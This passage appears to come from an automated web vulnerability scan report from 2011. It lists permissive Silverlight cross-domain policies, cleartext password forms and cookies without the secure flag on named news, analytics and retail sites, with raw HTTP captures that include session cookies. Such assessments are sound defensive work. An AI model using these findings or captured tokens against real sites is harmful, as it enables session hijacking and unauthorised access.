HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Wed, 03 Mar 2010 16:59:11 GMT
Accept-Ranges: bytes
ETag: "80d976d8f2baca1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Content-Length: 730
Date: Mon, 09 May 2011 15:36:35 GMT
Connection: close

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="Content-Type,SOAPAction">
               <domain uri="*"/>

...[SNIP]...

4.7. http://data.usatoday.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.usatoday.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: data.usatoday.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Wed, 03 Mar 2010 16:59:11 GMT
Accept-Ranges: bytes
ETag: "80d976d8f2baca1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Content-Length: 730
Date: Mon, 09 May 2011 15:37:58 GMT
Connection: close

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="Content-Type,SOAPAction">
               <domain uri="*"/>

...[SNIP]...

4.8. http://i.usatoday.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://i.usatoday.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: i.usatoday.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Wed, 03 Mar 2010 16:59:11 GMT
Accept-Ranges: bytes
ETag: "80d976d8f2baca1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Content-Length: 730
Date: Mon, 09 May 2011 15:36:39 GMT
Connection: close

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="Content-Type,SOAPAction">
               <domain uri="*"/>

...[SNIP]...

4.9. http://metrics.csmonitor.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.csmonitor.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.csmonitor.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:20 GMT
Server: Omniture DC/2.0.0
xserver: www96
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

4.10. http://metrics.npr.org/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.npr.org
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.npr.org

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:57 GMT
Server: Omniture DC/2.0.0
xserver: www391
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

4.11. http://s0.2mdn.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 09 May 2011 14:23:30 GMT
Expires: Fri, 06 May 2011 14:23:11 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 4295
Cache-Control: public, max-age=86400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

4.12. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:19 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Mon, 16 May 2011 15:35:19 GMT
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
ETag: "ff-4adbc4fc"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

4.13. http://spd.pointroll.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://spd.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: spd.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:128b"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Mon, 09 May 2011 15:39:55 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

4.14. http://speed.pointroll.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:527"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:35:10 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

4.15. http://usatoday1.112.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://usatoday1.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: usatoday1.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:51 GMT
Server: Omniture DC/2.0.0
xserver: www653
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

4.16. http://www.usatoday.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 03 Mar 2010 16:59:11 GMT
Accept-Ranges: bytes
ETag: "80d976d8f2baca1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 09 May 2011 15:36:43 GMT
Connection: close
Content-Length: 730

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="Content-Type,SOAPAction">
               <domain uri="*"/>

...[SNIP]...

5. Cleartext submission of password
There are 2 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


5.1. http://www.therepublic.com/login/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /login/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: ./login/process/ (relative to http://www.therepublic.com/login/). The form contains the following password field: login_password

Request

GET /login/ HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FreakAuth=423b87089976e0474ec7fcf078c4204a; __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html
Content-Length: 24003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>The Republic -
...[SNIP]...
</p>
<form id="login" method="post" action="./login/process/">
   <p>
...[SNIP]...
</span><input type="password" name="login_password" id="login_password" size="30"/>&nbsp<a href="./login/forgot/">
...[SNIP]...

5.2. http://www.therepublic.com/login/register/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /login/register/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: ./login/reg_step1_sub/ (relative to http://www.therepublic.com/login/register/). The form contains the following password fields: login_password, login_password_rep

Request

GET /login/register/ HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:57 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 25776

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>The Republic -
...[SNIP]...
</p>
<form id="login" method="post" action="./login/reg_step1_sub/">
   <p>
...[SNIP]...
</span><input type="password" name="login_password" id="login_password" size="30"/></p>
...[SNIP]...
</span><input type="password" name="login_password_rep" id="login_password_rep" size="30"/></p>
...[SNIP]...

6. SSL cookie without secure flag set
There are 7 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


6.1. https://shop.npr.org/index.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://shop.npr.org
Path:   /index.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set: ShoppingCartSession. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php?pcsid=dd4agnd4un1d3jrdith74nh772&p=one_page_checkout&start=1 HTTP/1.1
Host: shop.npr.org
Connection: keep-alive
Referer: http://shop.npr.org/index.php?p=cart
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; ShoppingCartSession=dd4agnd4un1d3jrdith74nh772; __utmz=28031614.1304955581.1.1.utmcsr=topnav|utmccn=topnav|utmcmd=topnav; s_cc=true; s_sq=nprorg%3D%2526pid%253DCommunity%25253ANPR.org%252520Registration%2526pidt%253D1%2526oid%253Djavascript%25253Avoid%2525280%252529%25253B%2526ot%253DA; __utma=28031614.1626637707.1304955581.1304955581.1304955581.1; __utmc=28031614; __utmb=28031614.7.10.1304955581

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:43:58 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: ShoppingCartSession=dd4agnd4un1d3jrdith74nh772; expires=Tue, 10-May-2011 01:43:58 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 65651

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...

6.2. https://www.groupon.com/dallas/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /dallas/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dallas/ HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
Referer: https://www.groupon.com/login
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 302 Moved Temporarily
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:38:06 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:06 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:38:06 GMT; HttpOnly
Status: 302
Location: http://www.groupon.com/dallas/
X-Runtime: 11
Cache-Control: no-cache
Content-Length: 96

<html><body>You are being <a href="http://www.groupon.com/dallas/">redirected</a>.</body></html>

6.3. https://www.groupon.com/learn

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /learn

Issue detail

The following cookies were issued by the application and do not have the secure flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /learn HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
Referer: https://www.groupon.com/login
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 302 Moved Temporarily
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:38:24 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:24 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:38:24 GMT; HttpOnly
Status: 302
Location: http://www.groupon.com/learn
X-Runtime: 15
Cache-Control: no-cache
Content-Length: 94

<html><body>You are being <a href="http://www.groupon.com/learn">redirected</a>.</body></html>

6.4. https://www.groupon.com/login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /login

Issue detail

The following cookies were issued by the application and do not have the secure flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; adchemy_id=q4; conversion_val=; _tpmed=cpc; _tpcid=q4; division=dallas; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; _thepoint=8dd18fc853ae097ffe774ef38887ee55; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.2.9.1304955341313

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:35:57 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:35:57 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:35:57 GMT; HttpOnly
Status: 200
ETag: "43fe666874ea7a2ba3c418d3a85b9227"
X-Runtime: 85
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 36760

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...

6.5. https://www.groupon.com/mobile

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /mobile

Issue detail

The following cookies were issued by the application and do not have the secure flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mobile HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
Referer: https://www.groupon.com/users/new
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; visited=visit_1; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 302 Moved Temporarily
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:38:30 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:30 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:38:30 GMT; HttpOnly
Status: 302
Location: http://www.groupon.com/mobile
X-Runtime: 13
Cache-Control: no-cache
Content-Length: 95

<html><body>You are being <a href="http://www.groupon.com/mobile">redirected</a>.</body></html>

6.6. https://www.groupon.com/users

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /users

Issue detail

The following cookies were issued by the application and do not have the secure flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /users HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
Referer: https://www.groupon.com/users/new
Cache-Control: max-age=0
Origin: https://www.groupon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55
Content-Length: 231

authenticity_token=ICfp1OvnKSBwXOdEcwa6DN9FNr34UQxyH%2FNwl5Q3Ga4%3D&user%5Bfull_name%5D=&user%5Bemail_address%5D=&user%5Bpassword%5D=&user%5Bpassword_confirmation%5D=&user%5Baccept_terms%5D=0&user%5Ba
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:36:13 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:36:13 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: auth_token=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:36:13 GMT; HttpOnly
Status: 302
Location: https://www.groupon.com/users/new
X-Runtime: 62
Cache-Control: no-cache
Content-Length: 99

<html><body>You are being <a href="https://www.groupon.com/users/new">redirected</a>.</body></html>

6.7. https://www.groupon.com/users/new

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /users/new

Issue detail

The following cookies were issued by the application and do not have the secure flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /users/new HTTP/1.1
